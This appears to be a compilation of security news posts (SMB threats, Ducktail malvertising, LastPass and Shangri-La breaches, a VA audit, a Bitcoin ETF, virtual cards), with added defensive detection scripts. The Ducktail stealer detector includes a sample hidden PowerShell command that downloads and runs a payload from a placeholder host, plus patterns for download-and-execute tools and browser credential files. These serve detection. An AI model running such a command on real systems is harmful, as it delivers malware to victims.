
SMB Cyber Threats: Information-Stealing Malware, Ransomware, and BEC


Small and medium-sized businesses (SMBs) are increasingly attractive targets for financially motivated cybercriminals. A recent report from the security firm Sophos identifies the top threats facing SMBs: information-stealing malware (infostealers), ransomware, and business email compromise (BEC).

Infostealers are built to quietly harvest sensitive data and login credentials, including saved browser passwords and session cookies, and they pose a particular risk to businesses without mature security controls. Their danger lies in how discreetly they operate: an infection is often discovered only after the stolen credentials have already been used.

Christopher Budd, director of Sophos X-Ops, notes that the value of stolen data keeps rising among cybercriminals, particularly where SMBs are concerned. He describes a hypothetical scenario in which attackers use an infostealer to obtain credentials for a business's accounting software, gaining access to its financial records and potentially redirecting funds into accounts they control.

The consequences of an infostealer compromise can therefore be severe, both financially and reputationally. Even so, Sophos still ranks ransomware as the single biggest threat to SMBs: the number of ransomware attacks has leveled off, but the tactics keep evolving.

One trend the report highlights is the rise of remote encryption attacks, in which the attacker runs the ransomware on an unmanaged device (one without endpoint protection) inside the victim's network and uses it to encrypt files on other systems over network shares. Because the malicious process never executes on the machines whose files are encrypted, endpoint protection on those machines sees only a burst of file modifications arriving from a remote host, which is why monitoring file-share activity from unmanaged sources matters as much as protecting the endpoints themselves. The approach shows how adaptable and persistent ransomware operators remain in their efforts to extort businesses.
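Remote encryption leaves its fingerprint on the file server rather than on the attacker's device, so a file-share audit trail is the place to look for it. The following is an added example, not code from the Sophos report or this blog: it runs a simple detection over a constructed set of share-access records and flags any remote host that renames many files to a new extension across several folders within a short window, noting whether that host is in the (constructed) endpoint-protection inventory. The event format, thresholds and host lists are assumptions chosen for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# Constructed sample of file-share audit records (not data from the Sophos report).
# Fields: timestamp, source host on the LAN, operation, path on the share (for renames,
# "old -> new"). 10.0.5.77 plays the unmanaged device bulk-renaming files; 10.0.1.20 is
# a managed workstation saving a spreadsheet the normal way.
EVENTS = [
    ("2024-03-01T09:00:01", "10.0.1.20", "write",  r"\\FS01\finance\q1.xlsx"),
    ("2024-03-01T09:00:05", "10.0.1.20", "write",  r"\\FS01\finance\q1.xlsx"),
    ("2024-03-01T09:00:09", "10.0.1.20", "rename", r"\\FS01\finance\~tmp.xlsx -> \\FS01\finance\q1.xlsx"),
    ("2024-03-01T09:01:00", "10.0.5.77", "rename", r"\\FS01\finance\q1.xlsx -> \\FS01\finance\q1.xlsx.locked"),
    ("2024-03-01T09:01:01", "10.0.5.77", "rename", r"\\FS01\finance\q2.xlsx -> \\FS01\finance\q2.xlsx.locked"),
    ("2024-03-01T09:01:02", "10.0.5.77", "rename", r"\\FS01\hr\payroll.docx -> \\FS01\hr\payroll.docx.locked"),
    ("2024-03-01T09:01:03", "10.0.5.77", "rename", r"\\FS01\hr\contracts.pdf -> \\FS01\hr\contracts.pdf.locked"),
    ("2024-03-01T09:01:04", "10.0.5.77", "rename", r"\\FS01\sales\leads.csv -> \\FS01\sales\leads.csv.locked"),
    ("2024-03-01T09:01:05", "10.0.5.77", "write",  r"\\FS01\sales\README_RESTORE.txt"),
]

# Constructed list of hosts covered by endpoint protection; anything else is "unmanaged".
MANAGED_HOSTS = {"10.0.1.20", "10.0.1.21", "10.0.1.22"}

WINDOW = timedelta(seconds=60)   # assumed detection window
MIN_EXT_CHANGES = 4              # extension-changing renames needed inside one window
MIN_DIRECTORIES = 2              # ...spread across at least this many folders


def extension_changed(rename_field):
    """True if an 'old -> new' rename replaces or appends the file extension."""
    old, new = (PureWindowsPath(p.strip()) for p in rename_field.split("->"))
    return old.suffix.lower() != new.suffix.lower()


def detect_remote_encryption(events, managed_hosts):
    """Flag hosts that change many extensions across several folders within WINDOW."""
    renames = defaultdict(list)
    for ts, host, op, path in events:
        if op == "rename" and extension_changed(path):
            new_path = PureWindowsPath(path.split("->")[1].strip())
            renames[host].append((datetime.fromisoformat(ts), str(new_path.parent).lower()))

    findings = {}
    for host, items in renames.items():
        items.sort()
        for i, (start, _) in enumerate(items):
            dirs = [d for t, d in items[i:] if t - start <= WINDOW]
            if len(dirs) >= MIN_EXT_CHANGES and len(set(dirs)) >= MIN_DIRECTORIES:
                findings[host] = {
                    "ext_changes": len(dirs),
                    "directories": len(set(dirs)),
                    "unmanaged": host not in managed_hosts,
                }
                break
    return findings


if __name__ == "__main__":
    for host, info in detect_remote_encryption(EVENTS, MANAGED_HOSTS).items():
        print(host, info)
```

The managed workstation's save-and-rename pattern (a temp file renamed to the same extension) is deliberately not counted, which keeps ordinary office software out of the alert. In a real deployment the records would come from the file server's object-access audit log or the NAS vendor's audit feed, and the "unmanaged" flag would be checked against the endpoint-protection console rather than a hard-coded set.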

Following closely behind ransomware, BEC attacks are another formidable threat to SMBs. In these attacks criminals conduct deceptive email exchanges, or even phone calls, with victims to extract sensitive information or manipulate them into transferring funds. Because BEC relies on social engineering rather than malware, increasingly polished pretexts let attackers bypass traditional technical defenses, which makes these attacks especially hard for SMBs to counter.

To mitigate these threats effectively, SMBs need a multi-layered approach: deploying robust endpoint protection on every device (an unprotected device is exactly what remote encryption exploits), patching software promptly to close known vulnerabilities, and giving employees practical training on recognizing phishing and payment-fraud attempts.

Multi-factor authentication and encryption add further layers of protection for sensitive data and communications. One caveat practitioners should keep in mind: MFA does not stop an attacker who replays a stolen session cookie, which is precisely what infostealers harvest, so sessions should be kept short-lived and revoked as soon as a compromise is suspected.

SMBs must treat cybersecurity as a fundamental part of business operations rather than an afterthought. By staying informed about emerging threats and investing in proactive measures, they can harden their defenses and protect their digital assets as attacks continue to grow in sophistication and scale.

Is Your Android Device Tracking You? Understanding its Monitoring Methods


General discussions about how Android phones collect location and personal data usually focus on third-party apps rather than Google's built-in apps. That awareness has grown because so many apps gather large amounts of information about their users, a concern that surfaces whenever eerily targeted ads start appearing. Many people still worry that apps, despite OS permissions, eavesdrop on private in-person conversations, a concern Instagram's head was asked about in a 2019 CBS News interview.

Attention to third-party apps, however, tends to overshadow the fact that Android itself and its integrated apps track users extensively. Much of this tracking supports features users want, but it leaves a substantial accumulation of sensitive personal data on the phone. Even people who trust Google with their information should understand what is collected and how it is used, especially since the options for opting out are limited.

For instance, a lesser-known feature lets Google Assistant infer where you parked your car and send a notification with its location. The inference is largely guesswork, varies in accuracy, and is not widely publicized by Google; it illustrates how tech companies combine personal data to produce results that can make users suspect eavesdropping.

The ways Android phones track users were laid out in an October 2021 Kaspersky blog post referencing a study by researchers from the University of Edinburgh and Trinity College Dublin. The list of installed apps looks innocuous on its own, but combined with other personal data it can reveal intimate details such as a user's religion or mental health status. Fusing app presence with location data lets machine-learning-based inference expose highly personal information.

Another focal point was the extensive collection of unique identifiers by Google and OEMs that tie users to specific handsets. Some of this collection legitimately aids troubleshooting, but identifiers such as the Google Advertising ID, the device serial number, and SIM card details can be combined to link a user's activity across phone number changes, factory resets, and ROM installations. The Advertising ID is user-resettable; the hardware serial number is not, which is why collecting the two together undermines the reset.

The study also emphasized how invasive some collection methods are, such as Xiaomi uploading the history of app windows viewed and Huawei's keyboard logging which apps were used and when. Details like call durations and keyboard activity allow inferences about users' activities and health, reflecting the extensive and often unnoticed data collection by smartphones described by Trinity College Dublin's Prof. Doug Leith.

Vietnamese Cybercriminals Exploit Malvertising to Target Facebook Business Accounts

Cybercriminals associated with the Vietnamese cybercrime ecosystem are exploiting social media platforms, including Meta-owned Facebook, as a means to distribute malware. 

According to WithSecure researcher Mohammad Kazem Hassan Nejad, these actors use deceptive ads to push scams and malvertising at victims. The tactic has become more lucrative as businesses increasingly advertise on social media, which gives attackers a new objective: hijacking the business accounts themselves.

Over the past year, cyber attacks against Meta Business and Facebook accounts have gained popularity, primarily driven by activity clusters like Ducktail and NodeStealer, known for targeting businesses and individuals operating on Facebook. 

Social engineering is central to gaining unauthorized access to accounts, with victims approached through Facebook, LinkedIn, WhatsApp, and freelance job portals such as Upwork. Search engine poisoning is another method, used to promote fake installers for popular software including CapCut, Notepad++, OpenAI ChatGPT, Google Bard, and Meta Threads.

Common tactics among these cybercrime groups include the misuse of URL shorteners, the use of Telegram for command-and-control (C2), and legitimate cloud services like Trello, Discord, Dropbox, iCloud, OneDrive, and Mediafire to host malicious payloads.

Ducktail, for instance, uses lures related to branding and marketing projects to infiltrate individuals and businesses on Meta's Business platform. In recent attacks, job and recruitment themes have been used to deliver the infection.

Potential targets are directed to fraudulent job postings on platforms like Upwork and Freelancer through Facebook ads or LinkedIn InMail. These postings link to booby-trapped job description files hosted on cloud storage providers, which lead to deployment of the Ducktail stealer.

The Ducktail malware is designed to steal saved session cookies from browsers, with specific code tailored to take over Facebook business accounts. These compromised accounts are sold on underground marketplaces, fetching prices ranging from $15 to $340.

Recent attack sequences observed between February and March 2023 use shortcut (.lnk) and PowerShell files to download and launch the final malware. The malware has evolved to harvest personal information from additional platforms, including X (formerly Twitter), TikTok Business, and Google Ads, and it uses the stolen Facebook session cookies to create fraudulent ads and gain elevated privileges within the victim's business account.

One of the primary methods used to take over a victim's compromised account involves adding the attacker's email address, changing the password, and locking the victim out of their Facebook account.

The malware has also gained new features, such as using RestartManager (RM), the Windows API for shutting down applications that hold files open, to kill the browser processes that lock the cookie and credential databases, a technique more commonly seen in ransomware. The final payload is additionally wrapped in a loader that decrypts and executes it in memory, making analysis and detection harder.
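The two behaviors described above (a shortcut-launched PowerShell that downloads and runs a payload, and a non-browser process reading the browser's cookie and login databases) are both visible to endpoint telemetry regardless of how the stealer gets past the file lock. The following is an added example, not code from WithSecure, Zscaler or this blog: it applies those two detection rules to a constructed set of process-start and file-open events. The event field names, the sample command line, the hostnames and the `example.invalid` URL are assumptions chosen for illustration.

```python
import re
from pathlib import PureWindowsPath

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}

# Chromium-based browsers keep cookies, saved logins and the key that protects them
# under "User Data"; the file names are stable even though Cookies moved into Network\.
CREDENTIAL_STORE = re.compile(
    r"\\User Data\\(?:.*\\)?(Cookies|Login Data|Web Data|Local State)$", re.IGNORECASE)

# Heuristics for a PowerShell download-and-run one-liner of the kind a .lnk dropper carries.
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
DOWNLOAD = re.compile(r"\b(iwr|Invoke-WebRequest|DownloadString|DownloadFile|Net\.WebClient|curl)\b", re.IGNORECASE)
EXECUTE = re.compile(r"\b(Start-Process|iex|Invoke-Expression|saps)\b", re.IGNORECASE)

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"

# Constructed telemetry (not from any vendor report). A double-clicked shortcut shows up
# as a child of explorer.exe; p.exe stands in for the stealer payload.
PROCESS_EVENTS = [
    {"pid": 4100, "image": EXPLORER, "parent": r"C:\Windows\winlogon.exe", "cmdline": "explorer.exe"},
    {"pid": 5212, "image": PS, "parent": EXPLORER,
     "cmdline": 'powershell.exe -w hidden -ep bypass -c "iwr https://example.invalid/p '
                '-OutFile $env:TEMP\\p.exe; Start-Process $env:TEMP\\p.exe"'},
    {"pid": 5300, "image": r"C:\Users\ann\AppData\Local\Temp\p.exe", "parent": PS, "cmdline": "p.exe"},
    {"pid": 2200, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent": EXPLORER, "cmdline": "chrome.exe"},
]
CHROME_PROFILE = r"C:\Users\ann\AppData\Local\Google\Chrome\User Data"
FILE_EVENTS = [
    {"pid": 2200, "path": CHROME_PROFILE + r"\Default\Network\Cookies"},   # the browser itself
    {"pid": 5300, "path": CHROME_PROFILE + r"\Default\Network\Cookies"},   # the stealer
    {"pid": 5300, "path": CHROME_PROFILE + r"\Default\Login Data"},
    {"pid": 5300, "path": CHROME_PROFILE + r"\Local State"},
]


def basename(path):
    return PureWindowsPath(path).name.lower()


def suspicious_powershell(proc):
    """Explorer-spawned PowerShell that hides its window and fetches and runs a payload."""
    if basename(proc["image"]) not in {"powershell.exe", "pwsh.exe"}:
        return False
    if basename(proc["parent"]) != "explorer.exe":
        return False
    cmd = proc["cmdline"]
    return bool(HIDDEN.search(cmd) and DOWNLOAD.search(cmd) and EXECUTE.search(cmd))


def detect_stealer_activity(process_events, file_events):
    """Return alerts as (rule, pid, detail) tuples."""
    by_pid = {p["pid"]: p for p in process_events}
    alerts = []
    for proc in process_events:
        if suspicious_powershell(proc):
            alerts.append(("lnk_powershell_dropper", proc["pid"], proc["cmdline"]))
    for ev in file_events:
        proc = by_pid.get(ev["pid"])
        if proc is None or not CREDENTIAL_STORE.search(ev["path"]):
            continue
        if basename(proc["image"]) not in BROWSERS:
            alerts.append(("non_browser_reads_credential_store", ev["pid"], ev["path"]))
    return alerts


if __name__ == "__main__":
    for alert in detect_stealer_activity(PROCESS_EVENTS, FILE_EVENTS):
        print(*alert)
```

The second rule is the more durable one: whether the stealer copies the locked database, kills the browser through RestartManager, or reads the file through a volume shadow copy, it still has to open a path under `User Data`, and a backup agent or browser is the only process that should. The first rule will need tuning in environments where administrators legitimately run hidden download-and-execute scripts from shortcuts.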

To hinder analysis efforts, the threat actors use uniquely generated assembly names and rely on SmartAssembly, bloating, and compression to obfuscate the malware.

Researchers from Zscaler also observed the threat actors initiating contact from compromised LinkedIn accounts belonging to users in the digital marketing field, borrowing the authenticity of those accounts for their social engineering. This gives Ducktail a worm-like propagation pattern: stolen LinkedIn credentials and cookies are used to log in to victims' accounts and reach their contacts in turn.

Ducktail is only one of several Vietnamese threat actors using shared tools and tactics for such schemes. A Ducktail copycat known as Duckport, which emerged in late March 2023, also performs information stealing and Meta Business account hijacking. Duckport differs from Ducktail in the Telegram channels used for command and control, in its source code, and in its distribution, which makes the two distinct threats.

Duckport has a distinctive delivery technique: it sends victims links to sites branded as the impersonated company, which redirect them to download malicious archives from file-hosting services. It also replaces Telegram as the channel for passing commands to victims' machines, abusing online note-taking services as part of its command-and-control chain, and adds further information-stealing and account-hijacking capabilities along with screenshot capture.

"The Vietnamese-centric element of these threats and high degree of overlaps in terms of capabilities, infrastructure, and victimology suggests active working relationships between various threat actors, shared tooling and TTPs across these threat groups, or a fractured and service-oriented Vietnamese cybercriminal ecosystem (akin to ransomware-as-a-service model) centered around social media platforms such as Facebook," WithSecure said.

BlackRock's Bitcoin ETF Reveals the Future of Cryptocurrency Surveillance



Surveillance of cryptocurrency trading is about to reach a new level as BlackRock awaits the SEC's decision on its Bitcoin ETF. The filing, submitted on June 15 by the world's largest asset manager, arrived while the Securities and Exchange Commission (SEC) and other regulators were cracking down on the crypto sector, which made its timing notable.

Some market observers wondered whether BlackRock would fare better than the many applicants the SEC had already rejected when it filed to establish a spot bitcoin exchange-traded fund in the U.S. A closer look at the application revealed the feature that sets it apart: a mechanism for making authorities aware of questionable trades.

That mechanism is the Surveillance-Sharing Agreement (SSA). Information-sharing agreements of this kind shift the balance of power by giving regulators the authority to request trading details, and the SSA is expected to weigh heavily in the SEC's decision.

After regulators voiced misgivings about its first filing, BlackRock submitted an amended application to the SEC that keeps its focus on Bitcoin spot markets.

Nasdaq, which filed on BlackRock's behalf, recently announced that BlackRock plans to finalize a surveillance agreement with Coinbase (COIN). That addresses one of the main objections the SEC raised when it rejected earlier spot Bitcoin ETF applications.

Given its financial standing, BlackRock's Bitcoin ETF is widely expected to win approval faster than its predecessors. The application triggered a series of follow-up filings centered on the SSA, and the SEC may approve it if the information-sharing arrangement gives the regulator the degree of oversight it has asked for.

People familiar with the process say the protocol uses information sharing and surveillance to deter manipulation of the cryptocurrency market. The requirement first came to light when the Winklevoss twins applied for a Bitcoin ETF in 2017. The details of the information exchange between Coinbase and Nasdaq are likewise required as part of the current request.

There is a tug-of-war among spot exchanges, regulators, ETF providers, and listing exchanges over how the data surveillance performed by spot exchanges will be administered. The information-sharing agreement also allows the spot exchange to share that data with ETF providers and regulators.

That sharing can put a spotlight on specific trades or traders. The agreement would also compel cryptocurrency exchanges to share data with each other, including personally identifiable information (PII) such as customer names and addresses. The Bitcoin ETF filings themselves do not spell out these information-sharing agreements, but a similar structure already exists in other markets, including in the US.

There is also the question of specificity: a targeted request for information about a particular trade differs from a subpoena, and the distinction matters. One person familiar with the matter told a reporter that the proposed arrangement could resemble a fishing expedition, with trade information shared broadly rather than exchanged point-to-point about a specific trade.

Many cryptocurrency traders value anonymity and came to crypto precisely to keep their information private. If the exchange-traded fund strategy is to succeed, that tension will have to be addressed.

The recent Bitcoin ETF applications still have gaps, and the Commission has asked applicants to resubmit them with more detail. Whether the outcome benefits the crypto industry, and on what terms, only time will tell.

What Are The Benefits of Sharing Information? 


Brokers and exchanges in equity markets have long operated under this combination of information sharing and surveillance. The regulator can ask for additional information about a client's trading history, and the firms must comply.

Suppose a broker submits an order to Nasdaq on behalf of a client and the exchange's SMARTS surveillance system flags the order as suspicious. Both the broker and the exchange may then have to file a suspicious activity report (SAR).

Regulators can investigate the SAR and request private information about the person behind the order, in particular to determine whether the same beneficial owner is behind a set of related trades. Depending on the facts of the case, consulting the Consolidated Audit Trail (CAT) may also be appropriate.

If the SEC approves BlackRock's Bitcoin ETF, it may also approve the other filings submitted the same day. Whatever the details of how the information sharing will work, one thing is certain: an approved ETF would give many more investors exposure to crypto assets and, as a side effect, increase cryptocurrency adoption.

BlackRock's revised application thus signals a new level of regulatory oversight of digital currency markets, with regulatory dynamics likely to shift toward stronger trade surveillance implemented through a Surveillance-Sharing Agreement and partnerships with exchanges such as Coinbase.

LastPass Experiences its Second Major Data Breach in 4 Months


LastPass's August data breach has allowed a hacker to get back into the company and steal customer data. LastPass announced on Wednesday that it is investigating the new breach, which involved a third-party cloud storage service connected to company systems. 

“We have determined that an unauthorized party, using information obtained in the August 2022 incident, was able to gain access to certain elements of our customers’ information,” the company wrote in a blog post. 

It is not yet known what data was stolen. LastPass says customers' passwords should remain safe because the company never stores the master password that customers use to decrypt their encrypted password vaults, so the vault contents cannot be read without it. That protection is only as strong as the master password itself, since anyone holding a copy of an encrypted vault can attempt to guess the password offline.

“We are working diligently to understand the scope of the incident and identify what specific information has been accessed. In the meantime, we can confirm that LastPass products and services remain fully functional,” the company said.  

Nonetheless, the incident shows that the August breach was more serious than it first appeared. At the time, the company said the breach affected only internal software development systems and did not involve customer password information. Even so, the hacker made off with portions of the company's source code and some proprietary technical information, which likely paved the way for the second intrusion.

LastPass also announced in September that it had completed its investigation into the breach with the assistance of cybersecurity firm Mandiant. According to the findings, the hacker only had access to the internal systems for four days. 

There was also no evidence of tampering. It now appears, however, that LastPass did not uncover every way the attacker could reuse that access to breach the company again. LastPass did not identify the third-party cloud storage service involved in the second breach, but it has been sharing the cloud storage service with its affiliate GoTo; both companies are currently owned by private equity firms.

In response to the new breach, LastPass has implemented additional security measures and increased monitoring of its IT infrastructure. It has also engaged Mandiant and notified law enforcement.

Is it Safe to Use Virtual Credit Cards?


People all over the world use the internet to pay bills, buy goods and services, and transfer money. The convenience comes with one major downside, security: millions of people fall victim to fraud and identity theft each year.

Staying safe online takes constant vigilance, secure software, and a range of skills. For online payments specifically, virtual credit cards add an extra layer of protection. A virtual card is a short-lived digital card, often intended for one-day or even one-time use, that is linked to a physical credit card or bank account.

Each virtual card carries its own card number, expiration date, and security code, so your real card details are never shown to or stored by the merchant. Consider how this plays out in practice. You have logged into your preferred e-commerce site, filled your cart, entered your details, and are about to pay. Instead of typing in your real credit card number, you create a new virtual card and enter its details instead.

Several weeks later you learn that the e-commerce site was compromised by an unknown threat actor who gained access to the company's systems, injected malicious code into the website, and stole customer data, including credit card numbers. Your real card and bank account are unaffected, because the merchant only ever saw the virtual card.

Because the virtual card you used has already expired, the stolen number is useless to the attacker and you can move on without worrying about the breach. That is the purpose of virtual credit cards: they keep your real card details out of threat actors' hands, and as a bonus they give you more privacy than a physical card.

Virtual credit cards are something anyone who values their security (and their hard-earned money) should consider. So how do you get one? The answer may be disappointing: your best option is to ask your bank whether it offers virtual cards. Many now do.

If your bank or card issuer is unable to provide a virtual credit card for whatever reason, there is a dedicated service called Privacy that you can use. It is a simple online platform for creating virtual cards: add a funding source, create a card, and you are ready to go.

Privacy offers more than card creation. You can set spending limits, keep multiple cards in an online wallet, set up recurring payments (useful for subscriptions), and track your spending. It also has a mobile app and a Chrome extension, so the service is reachable from almost any device.

More notably, Privacy is built with security in mind. It is PCI DSS compliant, the card industry's standard for handling cardholder data. Internet Protocol Security (IPsec) with AES-256 encryption protects communications between its data centers, Transport Layer Security (TLS) protects web traffic, customer passwords are stored hashed, and customer data is held on servers spread across the globe.

Privacy has three plans: Personal, Pro, and Teams. Personal is free but limits you to 12 virtual cards per month; Pro allows up to 36 and Teams up to 60, at $10 and $25 per month respectively.

There is one major drawback: Privacy is only available to US citizens and legal residents, plus residents of Puerto Rico, Guam, the Virgin Islands, the Northern Mariana Islands, and American Samoa. The company's website says it is working to expand globally, so keep an eye out if you are outside the US and need a virtual card.

An obvious disadvantage is that a virtual card cannot be handed over in person. You can, however, add a virtual card to a trusted mobile wallet and pay that way where contactless payment is accepted.
 
The main disadvantage compared with physical cards follows from their strength: they are meant for one-time or one-day use, and even a longer-lived virtual card should be rotated regularly for maximum security. The problem arises when you pay for something online with a virtual card and later need a refund because the goods never arrived or arrived damaged; if the card number has already expired, the refund may not go through.

A related issue is that some services require you to present the same card again. If you book a hotel online with a virtual card but do not pay the full amount in advance, the hotel may ask you to settle the bill with the card used for the booking, which you cannot do if that virtual card has already expired.

Virtual credit cards are secure, simple to use, free or at least inexpensive, and improve both your security and your privacy. Most importantly, they limit the damage from merchant breaches, fraud, and other forms of cybercrime.

The occasional trouble with refunds is a reasonable trade-off for most people. And until you get a virtual credit card, make sure you know the most common online shopping threats and how to avoid them.

Shangri-La Reports Major Data Breach at Eight Hotels, Guests Data Leaked


A database breach at Shangri-La Group has potentially exposed the personal information of guests who stayed at its hotels in Singapore, Hong Kong, Chiang Mai, Taipei, and Tokyo. 

Mr. Brian Yu, the group's senior vice-president for operations and process transformation, stated in an e-mail to affected guests on Friday: "A sophisticated threat actor managed to bypass Shangri-La's IT security monitoring systems undetected and illegally accessed the guest databases." According to the group's investigation, the breach occurred between May and July 2022.

Around the same time, Asia's top security summit, the Shangri-La Dialogue, returned to Singapore after a two-year hiatus due to the pandemic. The event was held from June 10 to 12 at the eponymous Shangri-La hotel on Orange Grove Road near Orchard Road. In the e-mail to affected guests, Mr. Yu confirmed that certain data files had been exfiltrated from the breached databases.

"Although we were not able to confirm the content of the exfiltrated data files, it is likely that they contained guest data," he added.

Upon being asked whether the Shangri-La Dialogue was specifically targeted, a hotel spokesman said, “There is no evidence to suggest any specific hotel or event was singled out. As a matter of policy, we do not disclose information about our guests.” 

"Data related to the Shangri-La Dialogue was stored on a separate secure server and was not affected in this incident," stated a spokesman for the event's organiser, the International Institute for Strategic Studies (IISS).

The Cyber Security Agency of Singapore said it is aware of the incident and urged organisations to monitor their IT networks regularly for signs of suspicious activity. The affected properties are:

• Shangri-La Apartments, Singapore
• Shangri-La Singapore
• Island Shangri-La, Hong Kong
• Kerry Hotel, Hong Kong
• Kowloon Shangri-La, Hong Kong
• Shangri-La Chiang Mai
• Shangri-La Far Eastern, Taipei
• Shangri-La Tokyo

Following the discovery of unauthorised network activity, the hotel group said it hired cyber forensic experts to investigate. According to its statement, the affected hotels' databases contained a combination of the following data: guest names, e-mail addresses, phone numbers, postal addresses, Shangri-La Circle membership numbers, reservation dates, and company names.

The hotel chain said there is currently no evidence that guests' personal information has been released or misused by third parties. As a precaution, in destinations where local regulations allow, it is offering affected guests a one-year complimentary identity monitoring service from Experian, a third-party provider.

"We deeply regret this has occurred and wish to assure you that all necessary steps have been taken to investigate and contain this incident. This notice provides information about what happened and how we can assist you," wrote Mr. Yu in the e-mail.

He assured guests that data such as passport numbers, ID numbers, dates of birth, and credit card numbers with expiry dates are stored encrypted. "Protecting our guests' information is very important to us and we wish to assure you that all necessary steps have been taken to further strengthen the security of our networks, systems, and databases. Once again, we deeply regret any inconvenience or concerns this incident may cause."

Watchdog Finds Over Half of Network Switch Operating Systems at VA Medical Center in Texas Are Outdated


According to an IT security assessment released on Tuesday by the Department of Veterans Affairs' Office of Inspector General (OIG), more than half of the network switches at the Harlingen VA Health Care Center in Harlingen, Texas, were running operating systems that the vendor no longer supports, and they did not meet the department's baseline configurations.

The audit evaluated whether Harlingen was complying with the information security safeguards required by the Federal Information Security Management Act (FISMA). The OIG said it chose Harlingen because the facility had not previously been reviewed as part of the annual FISMA audit.

Harlingen is part of the Texas Valley Coastal Bend Healthcare System, which receives approximately 300,000 outpatient visits per year. The OIG found deficiencies in three of the four security control areas at Harlingen: configuration management, contingency planning, and access controls. The inspection team documented no problems in the fourth area, security management.

The audit found significant weaknesses in Harlingen's configuration management controls, which are meant to identify and track the center's hardware and software components. These included an inaccurate component inventory, unremediated security flaws, and an inability to identify all critical and high-risk vulnerabilities across the center's network.

Most concerning was the OIG's finding that "almost 53 per cent of the Harlingen center's network switches used operating systems that no longer receive maintenance or vulnerability support from the vendor." Those outdated devices also failed to meet the baseline configurations for network equipment mandated by the VA Office of Information and Technology Configuration Control Board, which reflect "agreed-on specifications for systems or configuration items within those systems."

“Network devices and IT systems are an organization’s most critical infrastructure,” OIG said in its assessment. “Upgrading is not just a defensive strategy but a proactive one that protects network stability.”

Despite VA's use of an automated inventory system, the assessment found that different sources disagreed on how many IT components Harlingen has. VA's automated inventory counted 1,568 devices, while the OIG assessment team found 1,544 devices on the Harlingen network. VA's Enterprise Mission Assurance Support Services system (eMASS), which "allows for FISMA systems inventory tracking and reporting activities," listed only 942.

“Because VA’s eMASS is used for developing system security and privacy plans, without an accurate inventory of network devices in eMASS, VA has no assurance that these plans implement security controls for all the components within the system,” the audit said. 
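The three inventory counts above describe a common failure: devices that are live on the network but absent from the system security plan have no control coverage on paper, while stale plan entries inflate the count of what is "covered". The following is an added example, not code from the OIG, VA or this blog. It reconciles three constructed inventory views (an automated discovery tool, an independent on-site scan, and the security-plan inventory) and then computes the share of switches running software past its end-of-support date, the figure the audit reports as almost 53 percent. Hostnames, software trains, and end-of-support dates are all invented for illustration.

```python
from datetime import date

# Constructed inventories (not the OIG's data). Each maps hostname -> (device type, software train).
# They stand in for the three views the audit compared: the automated discovery tool, an
# independent on-site scan, and the inventory recorded in the system security plan (eMASS at VA).
DISCOVERY = {
    "sw-core-1": ("switch", "swos-12"), "sw-core-2": ("switch", "swos-12"),
    "sw-floor-3": ("switch", "swos-15"), "sw-floor-4": ("switch", "swos-12"),
    "ws-0101": ("workstation", "win10-21h2"), "ws-0102": ("workstation", "win10-21h2"),
    "db-labs": ("server", "linux-8"), "print-2f": ("printer", "fw-3.1"),
}
ONSITE_SCAN = {k: v for k, v in DISCOVERY.items() if k != "print-2f"}   # printer was off that day
ONSITE_SCAN["iot-hvac-1"] = ("controller", "unknown")                   # on the wire, unknown to discovery
SSP_INVENTORY = {k: DISCOVERY[k] for k in ("sw-core-1", "sw-core-2", "ws-0101", "db-labs")}
SSP_INVENTORY["sw-old-9"] = ("switch", "swos-9")                        # decommissioned, never removed

# Constructed vendor end-of-support dates per software train (hypothetical trains and dates).
END_OF_SUPPORT = {
    "swos-9": date(2018, 1, 31),
    "swos-12": date(2021, 6, 30),
    "swos-15": date(2027, 12, 31),
}


def reconcile(ssp, *observed):
    """Compare the security-plan inventory against every observed view of the network.

    Returns hosts that are live but absent from the plan (no assurance any control covers
    them), plan entries that no observation saw (stale records), and hosts on which the
    observed views disagree (candidates for a manual check).
    """
    views = [set(o) for o in observed]
    seen = set().union(*views)
    agreed = set.intersection(*views)
    return {
        "unplanned": sorted(seen - set(ssp)),
        "stale": sorted(set(ssp) - seen),
        "contested": sorted(seen - agreed),
    }


def unsupported_switches(inventory, eos, today):
    """Return (names of switches past vendor support, share of switches that are unsupported).

    A software train missing from the end-of-support table is treated as unsupported, on the
    principle that software you cannot place on a support timeline is not demonstrably supported.
    """
    switches = {h: train for h, (kind, train) in inventory.items() if kind == "switch"}
    unsupported = sorted(h for h, train in switches.items() if eos.get(train, date.min) < today)
    share = len(unsupported) / len(switches) if switches else 0.0
    return unsupported, share


if __name__ == "__main__":
    print(reconcile(SSP_INVENTORY, DISCOVERY, ONSITE_SCAN))
    print(unsupported_switches(DISCOVERY, END_OF_SUPPORT, date(2022, 1, 10)))
```

Run against the constructed data, the plan knows about only four of the nine devices seen on the network and still carries one switch nobody can find, which is the situation the quoted audit language describes. Note that the unsupported-switch share depends on which inventory you compute it over: the audit's figure is only meaningful against the inventory that actually reflects what is plugged in.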

The OIG's inspection team also compared its own on-site vulnerability scans, run from Jan. 10 to Jan. 13, 2022, with the remote scans performed by VA's Office of Information and Technology, and found 16 serious vulnerabilities on the Harlingen network that had not been mitigated within VA's established remediation timeframe. These included "five critical vulnerabilities on less than 1% of the computers and 11 high-risk vulnerabilities."

The inspection team further found that database administrators were not adequately maintaining log data; that computer rooms and communications closets throughout the facility lacked fire detection systems; and that the computer room housing the center's police servers lacked a visitor access log. Harlingen's contingency plan, the OIG noted, "did not fully address reconstituting all systems to restore IT operations to a fully operational state following a disaster."

The OIG made four recommendations to the VA's assistant secretary for information and technology and chief information officer "due to enterprise-wide IT security issues similar to those identified during previous FISMA audits and IT security reviews." The OIG also made another recommendation to Harlingen's director to “validate that appropriate physical and environmental security measures are implemented and functioning as intended.” VA concurred with all five recommendations. 

VA has long struggled to meet FISMA requirements, with the Government Accountability Office stating in a November 2019 report that VA was one of the federal agencies with inadequate information security protections, including when it came to implementing effective security controls and mitigating vulnerabilities.

On Sept. 22, the OIG released a separate IT security assessment of the Alexandria VA Medical Center in Pineville, Louisiana, documenting deficiencies in three of the facility's four security control areas and discovering "critical and high-risk vulnerabilities on 37% of the devices."

